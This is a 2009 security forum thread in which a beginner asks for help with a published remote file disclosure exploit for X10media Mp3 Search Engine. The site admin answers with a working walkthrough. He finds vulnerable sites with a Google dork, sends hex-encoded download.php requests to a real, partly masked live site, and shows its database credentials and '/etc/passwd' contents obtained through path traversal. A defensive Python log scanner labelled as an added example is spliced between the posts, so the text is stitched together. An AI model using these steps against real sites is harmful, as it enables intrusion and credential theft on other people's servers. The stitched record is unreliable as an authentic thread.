Waraxe IT Security Portal
Help the noob with "art of exploiting" xD
Posted: Mon May 18, 2009 8:57 pm
Arxi (Beginner) - Joined: May 18, 2009, Posts: 3

Hello guys. I found this forum to be very supportive for newbs in exploiting.

Here is an exploit for the x10media script, with instructions. I don't get the first part where I should encode the URL. I ran the script in cmd and all I get is "text copy" and nothing else. I am really a noob with exploits and I need help with this =)

A few questions: Should I keep the site open when running this PHP script?
Am I doing it right if I type in cmd > "php folder" and then php exploit.php?

I still have a lot of questions but I will save them for later xD

SCRIPT AND INSTRUCTIONS:

################# ~THUNDER ################################################################

~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability

~Found by : THUNDER <t4h[at]hotmail.fr>
~Dork: "This search engine is in no way intended for illegal downloads. "
~File : Download.php

===========================================================================================

To read files you need to encode the URL, so you can use this PHP code:
<?php
// Encode URL ** THUNDER **
// Hex-encode every byte of the string, two hex digits per byte.
// sprintf('%02x') is used instead of dechex() so that bytes below 0x10
// are not shortened to a single digit, which would break the decoding.
function enc($string){
    $hex = '';
    for ($i = 0; $i < strlen($string); $i++){
        $hex .= sprintf('%02x', ord($string[$i]));
    }
    return $hex;
}
// Read the value to encode from the "t" query parameter.
// The key must be quoted: $_GET[t] is a bare constant and fails on current PHP.
$thunder = isset($_GET['t']) ? $_GET['t'] : '';
echo enc($thunder);
?>

How to use : http://127.0.0.1/encode.php?t=[Url]
Ex : http://127.0.0.1/encode.php?t=includes/constants.php

##### ~Exploit ############################################################################


http://www.target.com/[path]/download.php?url=[Encoded url]

Example :
Let's download the constants.php file, which contains the database login and password.
The file will be downloaded with an .mp3 extension.

http://www.target.com/[path]/download.php?url=696e636c756465732f636f6e7374616e74732e706870

Open the downloaded file with any text editor, and you have the database credentials.



###########################################################################################

Hope you can help me =)
Posted: Tue May 19, 2009 11:55 am
waraxe (Site admin) - Joined: May 11, 2004, Posts: 2407, Location: Estonia, Tartu

First of all, you must search for an exploitable target. Use the Google dork:

http://www.google.ee/search?hl=et&q=%22This+search+engine+is+in+no+way+intended+for+illegal+downloads.+%22&btnG=Google+otsing&lr=&aq=f&oq=

And try the example from the exploit against targets till you find a working one.

http://www.p****d.com/download.php?url=696e636c756465732f636f6e7374616e74732e706870

Download that file and look inside - you can see database credentials:

Code:

/**
* Database Constants - these constants are required
* in order for there to be a successful connection
* to the MySQL database. Make sure the information is
* correct.
*/
define("DB_SERVER", "mysql.***com");
define("DB_USER", "p***d");
define("DB_PASS", "V***9");
define("DB_NAME", "p***");
define("DB_LINK", "db_link");


Now, you can download other files too. Let's try "/etc/passwd".
Open encoder:

http://www.waraxe.us/sql-char-encoder.html

enter "../../../../../../../../../../etc/passwd" and hit "Encode now!".

Look for "MySql hex-encoded string":

Code:

0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764


and just delete first two chars, so that you will get this:

Code:

2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764


Then use it in exploit:

http://www.p******d.com/download.php?url=2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764

And you get what expected:

Code:

daemon:x:1:1:Owner of many system processes:/:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/false
man:x:6:100:man:/var/cache/man:/bin/false
...
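To make the encoding step above concrete from the defensive side, here is an added Python example; it is not code from this thread, from THUNDER's advisory or from the X10media product. It decodes the hex "url=" parameter the way the download script expects, scans a few constructed access-log lines for requests whose decoded path leaves the media directory or is not an .mp3 file, and shows the containment check a patched download.php would need. The log lines, the media directory /var/www/mp3s and the .mp3 allowlist are assumptions.

```python
"""Added example for the thread above (not code from the post or from X10media):
decode the hex-encoded url= parameter, flag disclosure attempts in access logs,
and show the containment check a patched download.php should perform."""
import binascii
import posixpath
from urllib.parse import parse_qs, urlsplit

# Assumed media directory and allowed file type; the real product's layout is not known here.
MEDIA_DIR = "/var/www/mp3s"
ALLOWED_SUFFIXES = (".mp3",)

# Constructed sample access-log lines (not real traffic). The first two hex values are the
# ones discussed in the thread; the others are an ordinary song request, a malformed value
# and an unrelated request.
SAMPLE_LOG = """\
203.0.113.5 - - [19/May/2009:11:55:01 +0000] "GET /download.php?url=696e636c756465732f636f6e7374616e74732e706870 HTTP/1.1" 200 1320
203.0.113.5 - - [19/May/2009:11:55:09 +0000] "GET /download.php?url=2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1" 200 2048
198.51.100.7 - - [19/May/2009:12:01:44 +0000] "GET /download.php?url=736f6e672e6d7033 HTTP/1.1" 200 4194304
198.51.100.9 - - [19/May/2009:12:02:10 +0000] "GET /download.php?url=zz HTTP/1.1" 500 0
198.51.100.9 - - [19/May/2009:12:02:15 +0000] "GET /index.php HTTP/1.1" 200 5120
"""


def decode_hex_param(value):
    """Reverse the enc() helper from the thread: two hex digits per byte.
    Returns None when the value is not valid even-length hex."""
    try:
        return binascii.unhexlify(value).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def is_allowed_download(base_dir, requested):
    """Containment check a fixed download.php needs: reject absolute paths and NUL bytes,
    resolve '..' segments, and require the result to stay under base_dir and to be an
    allowed file type (a file inside the web root such as constants.php is still rejected)."""
    if requested.startswith("/") or "\x00" in requested:
        return False
    resolved = posixpath.normpath(posixpath.join(base_dir, requested))
    inside = resolved.startswith(base_dir.rstrip("/") + "/")
    return inside and resolved.endswith(ALLOWED_SUFFIXES)


def analyze_line(line):
    """Classify one access-log line; None when it is not a download.php request with url=."""
    try:
        request_target = line.split('"')[1].split(" ")[1]
    except IndexError:
        return None
    parts = urlsplit(request_target)
    if not parts.path.endswith("/download.php"):
        return None
    values = parse_qs(parts.query).get("url")
    if not values:
        return None
    decoded = decode_hex_param(values[0])
    if decoded is None:
        verdict = "malformed"
    elif is_allowed_download(MEDIA_DIR, decoded):
        verdict = "ok"
    else:
        verdict = "disclosure_attempt"
    return {"client": line.split(" ", 1)[0], "decoded": decoded, "verdict": verdict}


def scan_log(text):
    """Run analyze_line over every line and keep only the download.php findings."""
    findings = [analyze_line(line) for line in text.splitlines()]
    return [f for f in findings if f is not None]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["verdict"], finding["client"], finding["decoded"])
```

Running it prints one verdict per download.php request: the constants.php and /etc/passwd requests are flagged as disclosure attempts, the song request is accepted, and the non-hex value is reported as malformed. The same decode-then-check logic, placed in the download script itself instead of in a log scanner, is the fix: the hex encoding hides nothing from the server, so the check has to run on the decoded path.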
Posted: Tue May 19, 2009 12:26 pm
Arxi (Beginner) - Joined: May 18, 2009, Posts: 3

Pretty nicely written, but I STILL don't get how to encode the URL (embarrassed)

Here is what I did:

I ran my XAMPP.
I typed http://localhost/encode.php?t=http://www.****.com/ (www.****.com is my target)
And I get nothing.

I know I am quite boring, but if someone has a few minutes, please help me.
Posted: Tue May 19, 2009 4:05 pm
waraxe (Site admin) - Joined: May 11, 2004, Posts: 2407, Location: Estonia, Tartu

Arxi wrote:
Pretty nicely written, but I STILL don't get how to encode the URL (embarrassed)

Here is what I did:

I ran my XAMPP.
I typed http://localhost/encode.php?t=http://www.****.com/ (www.****.com is my target)
And I get nothing.

I know I am quite boring, but if someone has a few minutes, please help me.


You got it all wrong :)

This security vulnerability can be exploited manually. You only need a web browser. That encoding script is just an additional, optional utility. You can encode with that script, manually with an ASCII table, or with the SQL encoder, as I showed before.
And you have to encode the path of the file you want to download, not the website's URL!
By the way, it seems that you have no clue even about this exploit's possibilities. It's a remote file disclosure exploit, right? It will allow you to see what's inside files residing on the target server. This type of exploit can reveal potentially sensitive information, but usually more steps are needed for an effective attack.

And one more thing - don't post sensitive info here! That includes target URLs!
Posted: Tue May 19, 2009 4:33 pm
Arxi (Beginner) - Joined: May 18, 2009, Posts: 3

Gosh, I just found the hard truth (crying)

I don't even know what this script does.
Anyway, thanks for the minutes you spared to help me.